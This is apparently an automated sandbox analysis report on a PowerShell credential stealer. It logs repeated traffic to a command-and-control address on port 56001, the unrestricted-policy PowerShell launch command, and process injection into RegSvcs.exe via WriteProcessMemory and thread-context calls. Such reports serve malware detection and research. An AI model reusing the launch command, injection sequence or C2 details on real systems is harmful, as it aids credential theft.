                                                      Jan 14, 2025 18:02:36.335632086 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.621941090 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:36.627211094 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.627304077 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:36.636178970 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.722431898 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.762123108 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:36.835741997 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.838372946 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:36.843225002 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.843270063 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:36.848052979 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.958641052 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:37.012178898 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:37.090202093 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:37.092005014 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:37.096890926 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:37.096959114 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:37.101759911 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:56.631165981 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:56.636085033 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:56.636122942 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:56.640834093 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:57.012828112 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:57.059076071 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:57.173887014 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:57.175877094 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:57.180763960 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:57.180838108 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:57.185710907 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:59.106318951 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:59.152836084 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:59.268337965 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:59.309117079 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:05.779378891 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:05.784327030 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:05.785214901 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:05.790055037 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:06.166488886 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:06.215395927 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:06.330404043 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:06.336551905 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:06.341514111 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:06.341676950 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:06.346592903 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:08.700341940 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:08.705450058 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:08.705508947 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:08.710417032 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:09.089534998 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:09.137294054 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:09.268491030 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:09.271713018 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:09.276573896 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:09.276732922 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:09.281522036 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:25.122529030 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:25.168606997 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:25.289081097 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:25.340643883 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:28.713294983 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:28.718195915 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:28.720897913 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:28.725686073 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:28.947534084 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:29.001280069 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:29.112298965 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:29.121293068 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:29.126699924 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:29.127362967 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:29.132917881 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:47.389482975 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:47.572264910 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:47.572448969 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:47.577438116 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:47.947045088 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:47.996846914 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:48.204058886 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:48.206343889 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:48.211270094 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:48.211327076 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:48.216234922 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:51.137109041 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:51.185384035 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:51.300260067 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:51.340604067 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.013397932 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.018297911 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.021621943 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.026392937 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.400019884 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.453401089 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.565911055 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.574239969 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.579052925 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.579097033 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.583893061 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.637854099 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.642775059 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.642826080 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:53.647627115 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:53.963850021 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:54.003424883 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:54.128388882 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:54.131872892 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:54.137814045 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:54.137881041 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:54.142992020 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:55.497391939 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:55.502311945 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:55.505525112 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:55.510324001 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:55.892751932 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:55.934390068 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:56.081589937 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:56.083612919 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:56.088407040 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:03:56.088458061 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:03:56.093261003 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:09.153505087 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:09.158515930 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:09.159528017 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:09.164386988 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:09.540503025 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:09.590795040 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:09.706907034 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:09.710381031 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:09.715358973 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:09.715426922 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:09.720259905 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:12.700465918 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:12.705394030 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:12.707622051 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:12.712518930 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:13.090270042 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:13.137695074 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:13.253683090 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:13.258908033 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:13.263798952 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:13.266370058 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:13.271265030 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:17.877363920 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:17.877593994 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:17.877629995 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:17.877779007 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:17.877779007 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:17.878016949 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:17.878097057 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:32.341330051 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:32.346498966 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:32.346565008 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:32.351520061 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:32.739373922 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:32.794007063 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:32.910684109 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:32.913007975 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:32.918025017 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:32.918159962 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:32.923032999 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:43.195995092 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:43.340979099 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:43.364304066 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:43.528436899 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:46.919496059 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:46.924745083 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:46.924892902 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:46.929704905 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:47.306554079 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:47.437623024 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:47.473206997 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:47.475270033 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:47.480369091 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:47.481684923 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:47.486543894 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:48.497437954 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:48.502440929 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:48.502511024 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:48.507389069 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:48.884555101 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:48.934724092 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:49.076281071 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:49.086056948 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:49.091041088 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:49.091156006 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:49.096029997 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:50.841639996 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:50.846776009 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:50.847426891 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:50.852343082 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.260626078 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.340878963 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.348784924 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.353657961 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.353776932 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.358551979 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.426367044 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.429264069 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.434108973 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.434195042 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.439037085 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.739428043 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.825275898 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.894993067 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.927419901 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.932323933 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:04:51.932420015 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:04:51.937203884 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:01.825712919 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:01.831093073 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:01.831337929 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:01.836409092 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:02.212987900 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:02.252607107 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:02.423190117 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:02.425652027 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:02.430644989 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:02.431004047 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:02.435859919 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:12.225059986 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:12.230031013 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:12.230113029 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:12.234970093 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:12.603569031 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:12.782783985 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:12.782948017 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:12.783651114 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:12.788515091 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:05:12.788590908 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:05:12.793473005 CET560014977562.122.184.98192.168.2.9
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 14, 2025 18:01:37.628263950 CET5349397162.159.36.2192.168.2.9
                                                      Jan 14, 2025 18:01:38.191700935 CET6175553192.168.2.91.1.1.1
                                                      Jan 14, 2025 18:01:38.198760986 CET53617551.1.1.1192.168.2.9
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 14, 2025 18:01:38.191700935 CET192.168.2.91.1.1.10x276cStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 14, 2025 18:01:01.954188108 CET1.1.1.1192.168.2.90x6a61No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 18:01:01.954188108 CET1.1.1.1192.168.2.90x6a61No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 18:01:15.561182022 CET1.1.1.1192.168.2.90xb488No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 18:01:15.561182022 CET1.1.1.1192.168.2.90xb488No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 18:01:38.198760986 CET1.1.1.1192.168.2.90x276cName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:12:01:04
                                                      Start date:14/01/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1"
                                                      Imagebase:0x7ff760310000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:12:01:04
                                                      Start date:14/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:12:01:07
                                                      Start date:14/01/2025
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      Imagebase:0xae0000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:2.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:25
                                                        Total number of Limit Nodes:2
                                                        execution_graph 9242 7ff8879fd515 9247 7ff8879fcd18 9242->9247 9244 7ff8879fd524 9252 7ff8879fcd68 9244->9252 9246 7ff8879fd52e 9248 7ff8879fcd1d 9247->9248 9249 7ff8879fcd2c 9248->9249 9250 7ff8879ffcaa ResumeThread 9248->9250 9249->9244 9251 7ff8879ffcd6 9250->9251 9251->9244 9253 7ff8879fcd6d 9252->9253 9254 7ff8879fcf0c 9253->9254 9255 7ff8879ffcaa ResumeThread 9253->9255 9254->9246 9256 7ff8879ffcd6 9255->9256 9256->9246 9257 7ff887a00494 9258 7ff887a0049d WriteProcessMemory 9257->9258 9260 7ff887a00596 9258->9260 9261 7ff8879ff358 9262 7ff8879ff39f 9261->9262 9263 7ff8879ff3fe 9262->9263 9266 7ff8879fd360 9263->9266 9267 7ff8879ffc10 ResumeThread 9266->9267 9269 7ff8879ff41a 9267->9269 9270 7ff887a002a8 9271 7ff887a002af Wow64SetThreadContext 9270->9271 9273 7ff887a00354 9271->9273
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1419191877.00007FF887AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff887ac0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6B$6B$6B$6B$H$P*L$P*L$r6B$r6B
                                                        • API String ID: 0-3748217292
                                                        • Opcode ID: 0b8d246ebbd6d1cc911668efb4e9c09f29b75ac3f8ccd824fe8c699268e93aeb
                                                        • Instruction ID: 561eafe8226fc30c73643409ece9e3e4a29675fa72d4b78544a0d0a6c5e09cb8
                                                        • Opcode Fuzzy Hash: 0b8d246ebbd6d1cc911668efb4e9c09f29b75ac3f8ccd824fe8c699268e93aeb
                                                        • Instruction Fuzzy Hash: 3DD20462E4DBC95FE796972898562B87BE1FF96260B1901FFC04DC71D3EA189C06C342
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1419191877.00007FF887AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff887ac0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r6B$r6B
                                                        • API String ID: 0-2860294223
                                                        • Opcode ID: efd73ba1d28e7b545d8546e67fcf2deaa05ba71db94ce07fc45f6b3b7112e6ff
                                                        • Instruction ID: 81e8fc4c2b1aa1704ca5371ae77c8495176fc9bdfd186999071ca8e80145df88
                                                        • Opcode Fuzzy Hash: efd73ba1d28e7b545d8546e67fcf2deaa05ba71db94ce07fc45f6b3b7112e6ff
                                                        • Instruction Fuzzy Hash: 535114A1F4DA8A5FE7959A6C94A56787BF1FF95290B4801FAC40DCB193EE18DC01C341

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 585 7ff8879fd047-7ff8879fd049 586 7ff8879fd0bf-7ff8879fd0c2 585->586 587 7ff8879fd04b-7ff8879fd06a 585->587 591 7ff8879fd0c4-7ff8879fd0ce 586->591 592 7ff8879fd112 586->592 597 7ff8879fd06c-7ff8879fd0a6 587->597 598 7ff8879fd0ba 587->598 595 7ff8879fd114-7ff8879fd116 592->595 596 7ff8879fd162 592->596 605 7ff8879fd11d-7ff8879fd15e 595->605 599 7ff8879fd164-7ff8879fd1ae 596->599 600 7ff8879fd1b2 596->600 601 7ff8879fd0bc 598->601 602 7ff8879fd10a 598->602 599->600 603 7ff8879fd1b4-7ff8879fd1d1 600->603 604 7ff8879fd202-7ff8879fd211 600->604 601->602 606 7ff8879fd10c-7ff8879fd116 602->606 607 7ff8879fd15a-7ff8879fd1aa 602->607 639 7ff8879fd245-7ff8879fd249 603->639 611 7ff8879fd1d4-7ff8879fd1de 604->611 612 7ff8879fd213-7ff8879fd229 604->612 605->596 606->605 607->611 620 7ff8879fd1fa 607->620 631 7ff8879fd1e4-7ff8879fd1f9 611->631 617 7ff8879fd22a 612->617 623 7ff8879fd22c-7ff8879fd23e 617->623 624 7ff8879fd27a-7ff8879fd2c1 617->624 625 7ff8879fd1fc-7ff8879fd200 620->625 626 7ff8879fd24a 620->626 623->639 635 7ff8879fd2c2 624->635 625->604 625->631 642 7ff8879fd2c4-7ff8879fd2d1 635->642 643 7ff8879fd312 635->643 644 7ff8879fd20c-7ff8879fd229 639->644 645 7ff8879fd24b-7ff8879fd272 639->645 654 7ff8879fd344-7ff8879fd349 642->654 650 7ff8879fd314-7ff8879fd322 643->650 651 7ff8879fd362-7ff8879fd3a9 643->651 644->617 645->635 674 7ff8879fd274-7ff8879fd278 645->674 661 7ff8879fd324-7ff8879fd33f 650->661 662 7ff8879fd372-7ff8879fd37b 650->662 681 7ff8879fd36f 651->681 682 7ff8879fd3ab-7ff8879fd3af 651->682 666 7ff8879fd3bc 654->666 667 7ff8879fd34b-7ff8879ffcd4 ResumeThread 654->667 661->654 670 7ff8879ff450-7ff8879ff520 662->670 698 7ff8879ffcd6 667->698 699 7ff8879ffcdc-7ff8879ffd01 667->699 691 7ff8879ff522 670->691 692 7ff8879ff528-7ff8879ff581 call 7ff8879ff582 670->692 674->624 681->662 682->670 691->692 698->699
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1418736990.00007FF8879F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff8879f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27baa6ae218e56ba954fd192e75c1e86e8b145942710c936c5a313c3d6b58376
                                                        • Instruction ID: 8159edc5cc67b358955371a2b225ec6aa375ba4c5fd1e9011d1b7fa2087b70cc
